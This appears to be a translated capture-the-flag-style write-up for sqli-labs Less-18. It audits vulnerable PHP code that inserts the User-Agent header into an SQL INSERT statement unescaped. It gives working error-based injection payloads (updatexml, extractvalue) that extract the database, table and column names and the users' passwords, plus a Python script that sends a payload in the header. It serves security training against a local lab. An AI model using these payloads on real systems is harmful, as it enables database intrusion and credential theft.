SQL injection LESS18 (header injection + error injection)

Sign in Dumb:Dumb

Source audit

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
	
function check_input($value)
	{
    
	if(!empty($value))
		{
    
		// truncation (see comments)
		$value = substr($value,0,20);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
    
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
    
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
    
		$value = intval($value);
		}
	return $value;
	}



	$uagent = $_SERVER['HTTP_USER_AGENT'];
	$IP = $_SERVER['REMOTE_ADDR'];
	echo "<br>";
	echo 'Your IP ADDRESS is: ' .$IP;
	echo "<br>";
	//echo 'Your User Agent is: ' .$uagent; // take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); /* echo 'Your Your User name:'. $uname; echo "<br>"; echo 'Your Password:'. $passwd; echo "<br>"; echo 'Your User Agent String:'. $uagent; echo "<br>"; echo 'Your User Agent String:'. $IP; */ //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Agent:'.$uname."\n"); fclose($fp); $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if($row1) { echo '<font color= "#FFFF00" font size = 3 >'; $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert); //echo 'Your IP ADDRESS is: ' .$IP; echo "</font>"; //echo "<br>"; echo '<font color= "#0000ff" font size = 3 >'; echo 'Your User Agent is: ' .$uagent; echo "</font>"; echo "<br>"; print_r(mysql_error()); echo "<br><br>"; echo '<img src="../images/flag.jpg"  />'; echo "<br>"; } else { echo '<font color= "#0000ff" font size="3">'; //echo "Try again looser"; print_r(mysql_error()); echo "</br>"; echo "</br>"; echo '<img src="../images/slap.jpg"   />';	
			echo "</font>";  
			}

	}

?>

check_input function ,SQL Inject Less17( An error injection + Subquery ), Look at the last question

$value = substr($value,0,20); But this time take the first twenty characters

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

$_SERVER yes PHP One of the predefined variables , You can use it directly , It is one that contains information such as headers （header）、 route （path） And script location （script locations） Array of information .
$_SERVER The elements in the array are composed of Web Server creation , But there is no guarantee that every server will provide all the elements , Some servers may ignore some , Or provide some elements that are not listed here .

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

This time, $passwd Also added check_input function , So we can't go through passwd Conduct SQL Yes

$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);

One select Query statement , Because you have to $row1 Not empty , You can enter the following if, So we entered uname and passwd All users must exist correctly .

Core code

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);

$uagent Inserted into the database .

We control $uagent Carry out our payload

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1, concat('#', database()), 0), 1, 1) #

So set $uagent by

' or updatexml(1, concat('#', database()), 0), 1, 1) #

Just take the back one $IP, $uname Also written dead

Of course
' and updatexml(1, concat('#', database()), 0) and '1'='1

' or updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0),1,1)#

' or updatexml(1, concat("#", (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0),1,1) #

' or updatexml(1, concat("#", (select group_concat(username,password) from users)), 0),1,1) #

#coding:utf-8
import requests
url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"
str = "flag"
print("start!")
key = {
    'uname': "admin",'passwd':"admin"}
headers = {
    
    "Host": "localhost",
    "User-Agent": "'and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 5,1),'~')) and '1'='1",                                                           ""
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": "34",
    "Referer": "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/",
    "Cookie": "Phpstorm-b508df8e=d3fe512f-f910-46f4-ac3f-7937af84827d",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}
res = requests.post(url,headers = headers,data=key).text
if str in res:
    print("fish!")
    print(res)
print("end!")